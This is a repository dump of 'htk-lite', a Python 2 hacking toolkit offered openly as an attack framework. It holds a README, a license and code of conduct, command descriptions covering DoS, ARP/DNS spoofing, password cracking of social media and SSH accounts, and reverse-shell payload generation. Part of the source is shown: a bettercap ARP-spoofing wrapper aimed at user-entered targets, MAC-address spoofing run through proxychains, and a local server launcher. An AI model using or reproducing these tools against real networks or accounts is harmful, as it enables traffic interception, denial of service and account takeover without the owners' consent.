├── .github └── ISSUE_TEMPLATE │ └── custom.md ├── CODE_OF_CONDUCT.md ├── LICENSE ├── README.md ├── commandinfo ├── anon.txt ├── arpspoof.txt ├── aserver.txt ├── banner.txt ├── clear.txt ├── command.txt ├── dnsspoof.txt ├── dos.txt ├── exit.txt ├── hashid.txt ├── help.txt ├── infoscan.txt ├── monitor.txt ├── netscan.txt ├── password.txt ├── payload.txt ├── reboot.txt ├── sysinfo.txt ├── terminal.txt ├── traff.txt ├── verscan.txt └── wordlist.txt ├── commandlist ├── anon-off.py ├── anon-on.py ├── arpspoof.py ├── aserver.py ├── banner.py ├── clear.py ├── command.py ├── dnsspoof-all.py ├── dnsspoof.py ├── dos.py ├── exit.py ├── hashid.py ├── help.py ├── infoscan-o.py ├── infoscan.py ├── monitor-off.py ├── monitor-on.py ├── netscan.py ├── password.py ├── payload.py ├── reboot.py ├── sysinfo.py ├── terminal.py ├── traff.py ├── verscan.py └── wordlist.py ├── files ├── 1.png ├── 2.png ├── Instagram │ ├── Executable │ │ └── instagram.py │ ├── LICENSE │ ├── README.md │ ├── accounts.txt │ ├── database │ │ └── session.db │ ├── instagram.py │ ├── lib │ │ ├── __init__.py │ │ ├── __pycache__ │ │ │ ├── __init__.cpython-37.pyc │ │ │ ├── bad_proxies.cpython-37.pyc │ │ │ ├── browser.cpython-37.pyc │ │ │ ├── bruter.cpython-37.pyc │ │ │ ├── const.cpython-37.pyc │ │ │ ├── display.cpython-37.pyc │ │ │ ├── password_manager.cpython-37.pyc │ │ │ ├── proxy.cpython-37.pyc │ │ │ ├── proxy_list.cpython-37.pyc │ │ │ ├── proxy_manager.cpython-37.pyc │ │ │ ├── scraper.cpython-37.pyc │ │ │ └── session.cpython-37.pyc │ │ ├── bad_proxies.py │ │ ├── browser.py │ │ ├── bruter.py │ │ ├── const.py │ │ ├── display.py │ │ ├── password_manager.py │ │ ├── proxy.py │ │ ├── proxy_list.py │ │ ├── proxy_manager.py │ │ ├── scraper.py │ │ └── session.py │ ├── requirements.txt │ └── test_proxies.py └── fb-brute.pl ├── htkl.py ├── htklupdate.py ├── install.py └── wordlists └── example.txt /.github/ISSUE_TEMPLATE/custom.md: -------------------------------------------------------------------------------- 1 | --- 2 | name: Custom issue template 3 | about: Describe this issue template's purpose here. 4 | title: '' 5 | labels: '' 6 | assignees: '' 7 | 8 | --- 9 | 10 | 11 | -------------------------------------------------------------------------------- /CODE_OF_CONDUCT.md: -------------------------------------------------------------------------------- 1 | # Contributor Covenant Code of Conduct 2 | 3 | ## Our Pledge 4 | 5 | In the interest of fostering an open and welcoming environment, we as 6 | contributors and maintainers pledge to making participation in our project and 7 | our community a harassment-free experience for everyone, regardless of age, body 8 | size, disability, ethnicity, sex characteristics, gender identity and expression, 9 | level of experience, education, socio-economic status, nationality, personal 10 | appearance, race, religion, or sexual identity and orientation. 11 | 12 | ## Our Standards 13 | 14 | Examples of behavior that contributes to creating a positive environment 15 | include: 16 | 17 | * Using welcoming and inclusive language 18 | * Being respectful of differing viewpoints and experiences 19 | * Gracefully accepting constructive criticism 20 | * Focusing on what is best for the community 21 | * Showing empathy towards other community members 22 | 23 | Examples of unacceptable behavior by participants include: 24 | 25 | * The use of sexualized language or imagery and unwelcome sexual attention or 26 | advances 27 | * Trolling, insulting/derogatory comments, and personal or political attacks 28 | * Public or private harassment 29 | * Publishing others' private information, such as a physical or electronic 30 | address, without explicit permission 31 | * Other conduct which could reasonably be considered inappropriate in a 32 | professional setting 33 | 34 | ## Our Responsibilities 35 | 36 | Project maintainers are responsible for clarifying the standards of acceptable 37 | behavior and are expected to take appropriate and fair corrective action in 38 | response to any instances of unacceptable behavior. 39 | 40 | Project maintainers have the right and responsibility to remove, edit, or 41 | reject comments, commits, code, wiki edits, issues, and other contributions 42 | that are not aligned to this Code of Conduct, or to ban temporarily or 43 | permanently any contributor for other behaviors that they deem inappropriate, 44 | threatening, offensive, or harmful. 45 | 46 | ## Scope 47 | 48 | This Code of Conduct applies both within project spaces and in public spaces 49 | when an individual is representing the project or its community. Examples of 50 | representing a project or community include using an official project e-mail 51 | address, posting via an official social media account, or acting as an appointed 52 | representative at an online or offline event. Representation of a project may be 53 | further defined and clarified by project maintainers. 54 | 55 | ## Enforcement 56 | 57 | Instances of abusive, harassing, or otherwise unacceptable behavior may be 58 | reported by contacting the project team at erwin51074@gmail.com. All 59 | complaints will be reviewed and investigated and will result in a response that 60 | is deemed necessary and appropriate to the circumstances. The project team is 61 | obligated to maintain confidentiality with regard to the reporter of an incident. 62 | Further details of specific enforcement policies may be posted separately. 63 | 64 | Project maintainers who do not follow or enforce the Code of Conduct in good 65 | faith may face temporary or permanent repercussions as determined by other 66 | members of the project's leadership. 67 | 68 | ## Attribution 69 | 70 | This Code of Conduct is adapted from the [Contributor Covenant][homepage], version 1.4, 71 | available at https://www.contributor-covenant.org/version/1/4/code-of-conduct.html 72 | 73 | [homepage]: https://www.contributor-covenant.org 74 | 75 | For answers to common questions about this code of conduct, see 76 | https://www.contributor-covenant.org/faq 77 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | Apache License 2 | Version 2.0, January 2004 3 | http://www.apache.org/licenses/ 4 | 5 | TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION 6 | 7 | 1. Definitions. 8 | 9 | "License" shall mean the terms and conditions for use, reproduction, 10 | and distribution as defined by Sections 1 through 9 of this document. 11 | 12 | "Licensor" shall mean the copyright owner or entity authorized by 13 | the copyright owner that is granting the License. 14 | 15 | "Legal Entity" shall mean the union of the acting entity and all 16 | other entities that control, are controlled by, or are under common 17 | control with that entity. For the purposes of this definition, 18 | "control" means (i) the power, direct or indirect, to cause the 19 | direction or management of such entity, whether by contract or 20 | otherwise, or (ii) ownership of fifty percent (50%) or more of the 21 | outstanding shares, or (iii) beneficial ownership of such entity. 22 | 23 | "You" (or "Your") shall mean an individual or Legal Entity 24 | exercising permissions granted by this License. 25 | 26 | "Source" form shall mean the preferred form for making modifications, 27 | including but not limited to software source code, documentation 28 | source, and configuration files. 29 | 30 | "Object" form shall mean any form resulting from mechanical 31 | transformation or translation of a Source form, including but 32 | not limited to compiled object code, generated documentation, 33 | and conversions to other media types. 34 | 35 | "Work" shall mean the work of authorship, whether in Source or 36 | Object form, made available under the License, as indicated by a 37 | copyright notice that is included in or attached to the work 38 | (an example is provided in the Appendix below). 39 | 40 | "Derivative Works" shall mean any work, whether in Source or Object 41 | form, that is based on (or derived from) the Work and for which the 42 | editorial revisions, annotations, elaborations, or other modifications 43 | represent, as a whole, an original work of authorship. For the purposes 44 | of this License, Derivative Works shall not include works that remain 45 | separable from, or merely link (or bind by name) to the interfaces of, 46 | the Work and Derivative Works thereof. 47 | 48 | "Contribution" shall mean any work of authorship, including 49 | the original version of the Work and any modifications or additions 50 | to that Work or Derivative Works thereof, that is intentionally 51 | submitted to Licensor for inclusion in the Work by the copyright owner 52 | or by an individual or Legal Entity authorized to submit on behalf of 53 | the copyright owner. For the purposes of this definition, "submitted" 54 | means any form of electronic, verbal, or written communication sent 55 | to the Licensor or its representatives, including but not limited to 56 | communication on electronic mailing lists, source code control systems, 57 | and issue tracking systems that are managed by, or on behalf of, the 58 | Licensor for the purpose of discussing and improving the Work, but 59 | excluding communication that is conspicuously marked or otherwise 60 | designated in writing by the copyright owner as "Not a Contribution." 61 | 62 | "Contributor" shall mean Licensor and any individual or Legal Entity 63 | on behalf of whom a Contribution has been received by Licensor and 64 | subsequently incorporated within the Work. 65 | 66 | 2. Grant of Copyright License. Subject to the terms and conditions of 67 | this License, each Contributor hereby grants to You a perpetual, 68 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable 69 | copyright license to reproduce, prepare Derivative Works of, 70 | publicly display, publicly perform, sublicense, and distribute the 71 | Work and such Derivative Works in Source or Object form. 72 | 73 | 3. Grant of Patent License. Subject to the terms and conditions of 74 | this License, each Contributor hereby grants to You a perpetual, 75 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable 76 | (except as stated in this section) patent license to make, have made, 77 | use, offer to sell, sell, import, and otherwise transfer the Work, 78 | where such license applies only to those patent claims licensable 79 | by such Contributor that are necessarily infringed by their 80 | Contribution(s) alone or by combination of their Contribution(s) 81 | with the Work to which such Contribution(s) was submitted. If You 82 | institute patent litigation against any entity (including a 83 | cross-claim or counterclaim in a lawsuit) alleging that the Work 84 | or a Contribution incorporated within the Work constitutes direct 85 | or contributory patent infringement, then any patent licenses 86 | granted to You under this License for that Work shall terminate 87 | as of the date such litigation is filed. 88 | 89 | 4. Redistribution. You may reproduce and distribute copies of the 90 | Work or Derivative Works thereof in any medium, with or without 91 | modifications, and in Source or Object form, provided that You 92 | meet the following conditions: 93 | 94 | (a) You must give any other recipients of the Work or 95 | Derivative Works a copy of this License; and 96 | 97 | (b) You must cause any modified files to carry prominent notices 98 | stating that You changed the files; and 99 | 100 | (c) You must retain, in the Source form of any Derivative Works 101 | that You distribute, all copyright, patent, trademark, and 102 | attribution notices from the Source form of the Work, 103 | excluding those notices that do not pertain to any part of 104 | the Derivative Works; and 105 | 106 | (d) If the Work includes a "NOTICE" text file as part of its 107 | distribution, then any Derivative Works that You distribute must 108 | include a readable copy of the attribution notices contained 109 | within such NOTICE file, excluding those notices that do not 110 | pertain to any part of the Derivative Works, in at least one 111 | of the following places: within a NOTICE text file distributed 112 | as part of the Derivative Works; within the Source form or 113 | documentation, if provided along with the Derivative Works; or, 114 | within a display generated by the Derivative Works, if and 115 | wherever such third-party notices normally appear. The contents 116 | of the NOTICE file are for informational purposes only and 117 | do not modify the License. You may add Your own attribution 118 | notices within Derivative Works that You distribute, alongside 119 | or as an addendum to the NOTICE text from the Work, provided 120 | that such additional attribution notices cannot be construed 121 | as modifying the License. 122 | 123 | You may add Your own copyright statement to Your modifications and 124 | may provide additional or different license terms and conditions 125 | for use, reproduction, or distribution of Your modifications, or 126 | for any such Derivative Works as a whole, provided Your use, 127 | reproduction, and distribution of the Work otherwise complies with 128 | the conditions stated in this License. 129 | 130 | 5. Submission of Contributions. Unless You explicitly state otherwise, 131 | any Contribution intentionally submitted for inclusion in the Work 132 | by You to the Licensor shall be under the terms and conditions of 133 | this License, without any additional terms or conditions. 134 | Notwithstanding the above, nothing herein shall supersede or modify 135 | the terms of any separate license agreement you may have executed 136 | with Licensor regarding such Contributions. 137 | 138 | 6. Trademarks. This License does not grant permission to use the trade 139 | names, trademarks, service marks, or product names of the Licensor, 140 | except as required for reasonable and customary use in describing the 141 | origin of the Work and reproducing the content of the NOTICE file. 142 | 143 | 7. Disclaimer of Warranty. Unless required by applicable law or 144 | agreed to in writing, Licensor provides the Work (and each 145 | Contributor provides its Contributions) on an "AS IS" BASIS, 146 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or 147 | implied, including, without limitation, any warranties or conditions 148 | of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A 149 | PARTICULAR PURPOSE. You are solely responsible for determining the 150 | appropriateness of using or redistributing the Work and assume any 151 | risks associated with Your exercise of permissions under this License. 152 | 153 | 8. Limitation of Liability. In no event and under no legal theory, 154 | whether in tort (including negligence), contract, or otherwise, 155 | unless required by applicable law (such as deliberate and grossly 156 | negligent acts) or agreed to in writing, shall any Contributor be 157 | liable to You for damages, including any direct, indirect, special, 158 | incidental, or consequential damages of any character arising as a 159 | result of this License or out of the use or inability to use the 160 | Work (including but not limited to damages for loss of goodwill, 161 | work stoppage, computer failure or malfunction, or any and all 162 | other commercial damages or losses), even if such Contributor 163 | has been advised of the possibility of such damages. 164 | 165 | 9. Accepting Warranty or Additional Liability. While redistributing 166 | the Work or Derivative Works thereof, You may choose to offer, 167 | and charge a fee for, acceptance of support, warranty, indemnity, 168 | or other liability obligations and/or rights consistent with this 169 | License. However, in accepting such obligations, You may act only 170 | on Your own behalf and on Your sole responsibility, not on behalf 171 | of any other Contributor, and only if You agree to indemnify, 172 | defend, and hold each Contributor harmless for any liability 173 | incurred by, or claims asserted against, such Contributor by reason 174 | of your accepting any such warranty or additional liability. 175 | 176 | END OF TERMS AND CONDITIONS 177 | 178 | APPENDIX: How to apply the Apache License to your work. 179 | 180 | To apply the Apache License to your work, attach the following 181 | boilerplate notice, with the fields enclosed by brackets "[]" 182 | replaced with your own identifying information. (Don't include 183 | the brackets!) The text should be enclosed in the appropriate 184 | comment syntax for the file format. We also recommend that a 185 | file or class name and description of purpose be included on the 186 | same "printed page" as the copyright notice for easier 187 | identification within third-party archives. 188 | 189 | Copyright [yyyy] [name of copyright owner] 190 | 191 | Licensed under the Apache License, Version 2.0 (the "License"); 192 | you may not use this file except in compliance with the License. 193 | You may obtain a copy of the License at 194 | 195 | http://www.apache.org/licenses/LICENSE-2.0 196 | 197 | Unless required by applicable law or agreed to in writing, software 198 | distributed under the License is distributed on an "AS IS" BASIS, 199 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 200 | See the License for the specific language governing permissions and 201 | limitations under the License. 202 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # htk-lite 2 | htk-lite is a lighter version of hackers-tool-kit but it still has the same hacking ability as hackers-tool-kit too see updates check my instagram @tuf_unkn0wn 3 | 4 | ![](files/1.png) 5 | 6 | ![](files/2.png) 7 | 8 | # install 9 | 10 | INSTALLING IN /root/ DIRECTORY IS NOT REQUIRED BUT IS RECOMMENDED 11 | 12 | * `git clone https://github.com/unkn0wnh4ckr/htk-lite` 13 | 14 | * `cd htk-lite` 15 | 16 | * `python install.py` 17 | 18 | # run 19 | 20 | RUNNING AS ROOT IS NOT REQUIRED BUT IS RECOMMENDED 21 | 22 | * `cd htk-lite` 23 | 24 | * `python htkl.py` or `python htkl.py -h` 25 | 26 | # update 27 | 28 | * `cd htk-lite` 29 | 30 | * `python htklupdate.py` 31 | 32 | -------------------------------------------------------------------------------- /commandinfo/anon.txt: -------------------------------------------------------------------------------- 1 | ANON: 2 | 3 | make yourself anonymous with proxychains and macchanger 4 | -------------------------------------------------------------------------------- /commandinfo/arpspoof.txt: -------------------------------------------------------------------------------- 1 | ARPSPOOF: 2 | 3 | spoof ARP packages on a specific target or targets 4 | -------------------------------------------------------------------------------- /commandinfo/aserver.txt: -------------------------------------------------------------------------------- 1 | ASERVER: 2 | 3 | start a apache server on your local host and open it up on a browser 4 | -------------------------------------------------------------------------------- /commandinfo/banner.txt: -------------------------------------------------------------------------------- 1 | BANNER: 2 | 3 | prints out a random banner out of the 6 banners available 4 | -------------------------------------------------------------------------------- /commandinfo/clear.txt: -------------------------------------------------------------------------------- 1 | CLEAR: 2 | 3 | clears the screen 4 | -------------------------------------------------------------------------------- /commandinfo/command.txt: -------------------------------------------------------------------------------- 1 | COMMAND: 2 | 3 | runs a terminal command from the framework 4 | -------------------------------------------------------------------------------- /commandinfo/dnsspoof.txt: -------------------------------------------------------------------------------- 1 | DNSSPOOF: 2 | 3 | Start DNS Spoofing with bettercap to 4 | dns spoof the whole subnet instead of 5 | selecting a target type [dnsspoof --all] 6 | -------------------------------------------------------------------------------- /commandinfo/dos.txt: -------------------------------------------------------------------------------- 1 | DOS: 2 | 3 | runs Denial-Of-Service attacks with udp, syn, tcp, etc 4 | -------------------------------------------------------------------------------- /commandinfo/exit.txt: -------------------------------------------------------------------------------- 1 | EXIT: 2 | 3 | exits htk-lite 4 | -------------------------------------------------------------------------------- /commandinfo/hashid.txt: -------------------------------------------------------------------------------- 1 | HASHID: 2 | 3 | find out what type of hash a hash is 4 | -------------------------------------------------------------------------------- /commandinfo/help.txt: -------------------------------------------------------------------------------- 1 | HELP: 2 | 3 | will print out all the commands you can use in the framework 4 | with a cool banner 5 | -------------------------------------------------------------------------------- /commandinfo/infoscan.txt: -------------------------------------------------------------------------------- 1 | INFOSCAN: 2 | 3 | the infoscan command will try to get a bunch 4 | of information from a host like whois, dnslookup, cloudflare, etc 5 | if you type 'infoscan -o' in the framework you can 6 | run a specific scan if you only want to do one of them 7 | -------------------------------------------------------------------------------- /commandinfo/monitor.txt: -------------------------------------------------------------------------------- 1 | MONITOR: 2 | 3 | turn monitor mode on and off with airmon-ng 4 | -------------------------------------------------------------------------------- /commandinfo/netscan.txt: -------------------------------------------------------------------------------- 1 | NETSCAN: 2 | 3 | scan for information about your network devices, mac addresses, etc 4 | -------------------------------------------------------------------------------- /commandinfo/password.txt: -------------------------------------------------------------------------------- 1 | PASSWORD: 2 | 3 | crack passwords for social media, wifi, services like ssh, ftp, etc 4 | using dictionary attacks (require wordlists) 5 | -------------------------------------------------------------------------------- /commandinfo/payload.txt: -------------------------------------------------------------------------------- 1 | PAYLOAD: 2 | 3 | makes a payload with msfvenom these payloads are mostly 4 | reverse_tcp 5 | -------------------------------------------------------------------------------- /commandinfo/reboot.txt: -------------------------------------------------------------------------------- 1 | REBOOT: 2 | 3 | reboots the htk-lite script 4 | -------------------------------------------------------------------------------- /commandinfo/sysinfo.txt: -------------------------------------------------------------------------------- 1 | SYSINFO: 2 | 3 | shows information about your device uname, public ip, os, etc 4 | -------------------------------------------------------------------------------- /commandinfo/terminal.txt: -------------------------------------------------------------------------------- 1 | TERMINAL: 2 | 3 | open a new terminal window 4 | -------------------------------------------------------------------------------- /commandinfo/traff.txt: -------------------------------------------------------------------------------- 1 | TRAFF: 2 | 3 | shows internet traffic packages 4 | -------------------------------------------------------------------------------- /commandinfo/verscan.txt: -------------------------------------------------------------------------------- 1 | VERSCAN: 2 | 3 | scan services for their version 4 | -------------------------------------------------------------------------------- /commandinfo/wordlist.txt: -------------------------------------------------------------------------------- 1 | WORDLIST: 2 | 3 | make wordlists with cupp for dictionary attacks 4 | -------------------------------------------------------------------------------- /commandlist/anon-off.py: -------------------------------------------------------------------------------- 1 | #!/usr/local/bin/python 2 | # coding: latin-1 3 | #if you use this code give me credit @tuf_unkn0wn 4 | #i do not give you permission to show / edit this script without my credit 5 | #to ask questions or report a problem message me on instagram @tuf_unkn0wn 6 | """ 7 | 8 | 9 | ██░ ██ ▄▄▄ ▄████▄ ██ ▄█▀▓█████ ▓█████▄ 10 | ▓██░ ██▒▒████▄ ▒██▀ ▀█ ██▄█▒ ▓█ ▀ ▒██▀ ██▌ 11 | ▒██▀▀██░▒██ ▀█▄ ▒▓█ ▄ ▓███▄░ ▒███ ░██ █▌ 12 | ░▓█ ░██ ░██▄▄▄▄██ ▒▓▓▄ ▄██▒▓██ █▄ ▒▓█ ▄ ░▓█▄ ▌ 13 | ░▓█▒░██▓ ▓█ ▓██▒▒ ▓███▀ ░▒██▒ █▄░▒████▒░▒████▓ 14 | ▒ ▒░▒ ▒▒ ▓▒█ ░▒ ▒ ░▒ ▒▒ ▓▒ ▒░ ░ ▒▒▓ ▒ 15 | ▒ ░▒░ ░ ▒ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░ ░ ░ ░ ▒ ▒ 16 | ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ░ 17 | ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ 18 | ░ ░ 19 | 20 | 21 | """ 22 | import os 23 | import sys 24 | import random 25 | lred = '\033[91m' 26 | lblue = '\033[94m' 27 | lgreen = '\033[92m' 28 | yellow = '\033[93m' 29 | cyan = '\033[1;36m' 30 | purple = '\033[95m' 31 | red = '\033[31m' 32 | green = '\033[32m' 33 | blue = '\033[34m' 34 | orange = '\033[33m' 35 | 36 | colorlist = [red, blue, green, yellow, lblue, purple, cyan, lred, lgreen, orange] 37 | randomcolor = random.choice(colorlist) 38 | banner3list = [red, blue, green, purple] 39 | 40 | def anonoff(): 41 | print "\033[93m------------------------\033[0m" 42 | print "\nSTOPPING MACCHANGER\n" 43 | print "\033[93m------------------------\033[0m" 44 | os.system("iwconfig") 45 | k = raw_input("Interface: ") 46 | c = 'ifconfig {0} down'.format(k) 47 | os.system(c) 48 | os.system("macchanger -p " + k) 49 | s = 'ifconfig {0} up'.format(k) 50 | os.system(s) 51 | sys.exit() 52 | reboot() 53 | anonoff() 54 | -------------------------------------------------------------------------------- /commandlist/anon-on.py: -------------------------------------------------------------------------------- 1 | #!/usr/local/bin/python 2 | # coding: latin-1 3 | #if you use this code give me credit @tuf_unkn0wn 4 | #i do not give you permission to show / edit this script without my credit 5 | #to ask questions or report a problem message me on instagram @tuf_unkn0wn 6 | """ 7 | 8 | 9 | ██░ ██ ▄▄▄ ▄████▄ ██ ▄█▀▓█████ ▓█████▄ 10 | ▓██░ ██▒▒████▄ ▒██▀ ▀█ ██▄█▒ ▓█ ▀ ▒██▀ ██▌ 11 | ▒██▀▀██░▒██ ▀█▄ ▒▓█ ▄ ▓███▄░ ▒███ ░██ █▌ 12 | ░▓█ ░██ ░██▄▄▄▄██ ▒▓▓▄ ▄██▒▓██ █▄ ▒▓█ ▄ ░▓█▄ ▌ 13 | ░▓█▒░██▓ ▓█ ▓██▒▒ ▓███▀ ░▒██▒ █▄░▒████▒░▒████▓ 14 | ▒ ▒░▒ ▒▒ ▓▒█ ░▒ ▒ ░▒ ▒▒ ▓▒ ▒░ ░ ▒▒▓ ▒ 15 | ▒ ░▒░ ░ ▒ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░ ░ ░ ░ ▒ ▒ 16 | ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ░ 17 | ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ 18 | ░ ░ 19 | 20 | 21 | """ 22 | import os 23 | import sys 24 | import random 25 | lred = '\033[91m' 26 | lblue = '\033[94m' 27 | lgreen = '\033[92m' 28 | yellow = '\033[93m' 29 | cyan = '\033[1;36m' 30 | purple = '\033[95m' 31 | red = '\033[31m' 32 | green = '\033[32m' 33 | blue = '\033[34m' 34 | orange = '\033[33m' 35 | 36 | colorlist = [red, blue, green, yellow, lblue, purple, cyan, lred, lgreen, orange] 37 | randomcolor = random.choice(colorlist) 38 | banner3list = [red, blue, green, purple] 39 | 40 | def anonon(): 41 | print "\033[93m------------------------\033[0m" 42 | print "\nSTARTING MACCHANGER\n" 43 | print "\033[93m------------------------\033[0m" 44 | os.system("iwconfig") 45 | k = raw_input("Interface: ") 46 | c = 'ifconfig {0} down'.format(k) 47 | os.system(c) 48 | os.system("macchanger -r " + k) 49 | s = 'ifconfig {0} up'.format(k) 50 | os.system(s) 51 | show = 'macchanger -s {0}'.format(k) 52 | os.system(show) 53 | os.system('proxychains python htkl.py --quickrun') 54 | 55 | anonon() 56 | -------------------------------------------------------------------------------- /commandlist/arpspoof.py: -------------------------------------------------------------------------------- 1 | #!/usr/local/bin/python 2 | # coding: latin-1 3 | #if you use this code give me credit @tuf_unkn0wn 4 | #i do not give you permission to show / edit this script without my credit 5 | #to ask questions or report a problem message me on instagram @tuf_unkn0wn 6 | """ 7 | 8 | 9 | ██░ ██ ▄▄▄ ▄████▄ ██ ▄█▀▓█████ ▓█████▄ 10 | ▓██░ ██▒▒████▄ ▒██▀ ▀█ ██▄█▒ ▓█ ▀ ▒██▀ ██▌ 11 | ▒██▀▀██░▒██ ▀█▄ ▒▓█ ▄ ▓███▄░ ▒███ ░██ █▌ 12 | ░▓█ ░██ ░██▄▄▄▄██ ▒▓▓▄ ▄██▒▓██ █▄ ▒▓█ ▄ ░▓█▄ ▌ 13 | ░▓█▒░██▓ ▓█ ▓██▒▒ ▓███▀ ░▒██▒ █▄░▒████▒░▒████▓ 14 | ▒ ▒░▒ ▒▒ ▓▒█ ░▒ ▒ ░▒ ▒▒ ▓▒ ▒░ ░ ▒▒▓ ▒ 15 | ▒ ░▒░ ░ ▒ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░ ░ ░ ░ ▒ ▒ 16 | ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ░ 17 | ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ 18 | ░ ░ 19 | 20 | 21 | """ 22 | import os 23 | import sys 24 | import random 25 | lred = '\033[91m' 26 | lblue = '\033[94m' 27 | lgreen = '\033[92m' 28 | yellow = '\033[93m' 29 | cyan = '\033[1;36m' 30 | purple = '\033[95m' 31 | red = '\033[31m' 32 | green = '\033[32m' 33 | blue = '\033[34m' 34 | orange = '\033[33m' 35 | 36 | colorlist = [red, blue, green, yellow, lblue, purple, cyan, lred, lgreen, orange] 37 | randomcolor = random.choice(colorlist) 38 | banner3list = [red, blue, green, purple] 39 | 40 | def arpspoof(): 41 | print "\033[93mif using multiple targets heres an example: 134.143.1.3, 134.143.1.6\033[0m\n" 42 | h = raw_input("\033[1mTarget/s:\033[0m ") 43 | os.system('echo "net.sniff on\n" >> arp.cap') 44 | os.system('echo "set arp.spoof.targets {0}\n" >> arp.cap'.format(h)) 45 | os.system('echo "arp.spoof on\n" >> arp.cap') 46 | print '\n\033[93mto stop type "exit"\033[0m' 47 | os.system("sleep 2") 48 | os.system("bettercap -no-history -caplet arp.cap") 49 | os.system("rm arp.cap") 50 | 51 | arpspoof() 52 | -------------------------------------------------------------------------------- /commandlist/aserver.py: -------------------------------------------------------------------------------- 1 | #!/usr/local/bin/python 2 | # coding: latin-1 3 | #if you use this code give me credit @tuf_unkn0wn 4 | #i do not give you permission to show / edit this script without my credit 5 | #to ask questions or report a problem message me on instagram @tuf_unkn0wn 6 | """ 7 | 8 | 9 | ██░ ██ ▄▄▄ ▄████▄ ██ ▄█▀▓█████ ▓█████▄ 10 | ▓██░ ██▒▒████▄ ▒██▀ ▀█ ██▄█▒ ▓█ ▀ ▒██▀ ██▌ 11 | ▒██▀▀██░▒██ ▀█▄ ▒▓█ ▄ ▓███▄░ ▒███ ░██ █▌ 12 | ░▓█ ░██ ░██▄▄▄▄██ ▒▓▓▄ ▄██▒▓██ █▄ ▒▓█ ▄ ░▓█▄ ▌ 13 | ░▓█▒░██▓ ▓█ ▓██▒▒ ▓███▀ ░▒██▒ █▄░▒████▒░▒████▓ 14 | ▒ ▒░▒ ▒▒ ▓▒█ ░▒ ▒ ░▒ ▒▒ ▓▒ ▒░ ░ ▒▒▓ ▒ 15 | ▒ ░▒░ ░ ▒ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░ ░ ░ ░ ▒ ▒ 16 | ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ░ 17 | ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ 18 | ░ ░ 19 | 20 | 21 | """ 22 | import os 23 | import sys 24 | import random 25 | import socks 26 | import socket 27 | lred = '\033[91m' 28 | lblue = '\033[94m' 29 | lgreen = '\033[92m' 30 | yellow = '\033[93m' 31 | cyan = '\033[1;36m' 32 | purple = '\033[95m' 33 | red = '\033[31m' 34 | green = '\033[32m' 35 | blue = '\033[34m' 36 | orange = '\033[33m' 37 | 38 | colorlist = [red, blue, green, yellow, lblue, purple, cyan, lred, lgreen, orange] 39 | randomcolor = random.choice(colorlist) 40 | banner3list = [red, blue, green, purple] 41 | 42 | def aserver(): 43 | gw = os.popen("ip -4 route show default").read().split() 44 | s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) 45 | s.connect((gw[2], 0)) 46 | ipaddr = s.getsockname()[0] 47 | print "\033[93mStarting Server\033[0m..." 48 | os.system("service apache2 start") 49 | br = raw_input("\033[92mBrowser: \033[0m") 50 | a = '{0} {1}'.format(br,ipaddr) 51 | os.system(a) 52 | stop = raw_input("\033[1mhit enter to stop server:\033[0m ") 53 | print "\033[93mStopping Server\033[0m..." 54 | os.system("service apache2 stop") 55 | 56 | aserver() 57 | -------------------------------------------------------------------------------- /commandlist/banner.py: -------------------------------------------------------------------------------- 1 | #!/usr/local/bin/python 2 | # coding: latin-1 3 | #if you use this code give me credit @tuf_unkn0wn 4 | #i do not give you permission to show / edit this script without my credit 5 | #to ask questions or report a problem message me on instagram @tuf_unkn0wn 6 | """ 7 | 8 | 9 | ██░ ██ ▄▄▄ ▄████▄ ██ ▄█▀▓█████ ▓█████▄ 10 | ▓██░ ██▒▒████▄ ▒██▀ ▀█ ██▄█▒ ▓█ ▀ ▒██▀ ██▌ 11 | ▒██▀▀██░▒██ ▀█▄ ▒▓█ ▄ ▓███▄░ ▒███ ░██ █▌ 12 | ░▓█ ░██ ░██▄▄▄▄██ ▒▓▓▄ ▄██▒▓██ █▄ ▒▓█ ▄ ░▓█▄ ▌ 13 | ░▓█▒░██▓ ▓█ ▓██▒▒ ▓███▀ ░▒██▒ █▄░▒████▒░▒████▓ 14 | ▒ ▒░▒ ▒▒ ▓▒█ ░▒ ▒ ░▒ ▒▒ ▓▒ ▒░ ░ ▒▒▓ ▒ 15 | ▒ ░▒░ ░ ▒ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░ ░ ░ ░ ▒ ▒ 16 | ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ░ 17 | ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ 18 | ░ ░ 19 | 20 | 21 | """ 22 | import os 23 | import sys 24 | import random 25 | lred = '\033[91m' 26 | lblue = '\033[94m' 27 | lgreen = '\033[92m' 28 | yellow = '\033[93m' 29 | cyan = '\033[1;36m' 30 | purple = '\033[95m' 31 | red = '\033[31m' 32 | green = '\033[32m' 33 | blue = '\033[34m' 34 | orange = '\033[33m' 35 | 36 | colorlist = [red, blue, green, yellow, lblue, purple, cyan, lred, lgreen, orange] 37 | randomcolor = random.choice(colorlist) 38 | banner3list = [red, blue, green, purple] 39 | 40 | def mainbanner1(): 41 | print """\033[1;36m 42 | ┬ ┬┌┬┐┌─┐\033[0m 43 | │ │ │ ├┤ \033[1;36m 44 | ┴─┘┴ ┴ └─┘ \033[0m 45 | ██╗ ██╗████████╗██╗ ██╗ 46 | ██║ ██║╚══██╔══╝██║ ██╔╝\033[1;36m 47 | ███████║ ██║ █████╔╝ \033[0m 48 | 